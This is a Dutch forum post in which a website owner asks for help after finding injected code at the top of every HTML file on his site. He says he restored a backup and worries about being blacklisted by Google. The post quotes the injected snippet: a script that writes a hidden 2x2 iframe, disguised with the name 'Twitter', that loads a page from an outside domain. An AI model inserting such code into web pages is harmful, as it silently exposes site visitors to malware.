Hallo,
Ik heb even een vraag betreft een website die ik zelf heb opgebouwd.
Deze is sinds een maand of 2 online en begin wat last te krijgen van Malware op die website.
Onlangs zat "plots" volgende code :
in al men HTML bestanden en ik weet niet direct hoe ik het kan tegenhouden. Ik heb direct een backup terug geplaatst en (logisch) alles werkte terug perfect.
Heeft iemand enig idee hoe het komt dat dit bovenaan men body terecht komt? en nog beter hoe ik het in de toekomst kan vermijden?
Geluk dat ik het zeer vlug heb ontdekt want plots komt je website op een blacklist te staan bij oa Google en dan is die plots niet meer bereikbaar.
Alvast bedankt
Mvg
Peter
Ik heb even een vraag betreft een website die ik zelf heb opgebouwd.
Deze is sinds een maand of 2 online en begin wat last te krijgen van Malware op die website.
Onlangs zat "plots" volgende code :
code:
1
2
3
| <!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://interviewerbacklit.org/news.php?id=e6f6402caf60df3a" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d--> |
in al men HTML bestanden en ik weet niet direct hoe ik het kan tegenhouden. Ik heb direct een backup terug geplaatst en (logisch) alles werkte terug perfect.
Heeft iemand enig idee hoe het komt dat dit bovenaan men body terecht komt? en nog beter hoe ik het in de toekomst kan vermijden?
Geluk dat ik het zeer vlug heb ontdekt want plots komt je website op een blacklist te staan bij oa Google en dan is die plots niet meer bereikbaar.
Alvast bedankt
Mvg
Peter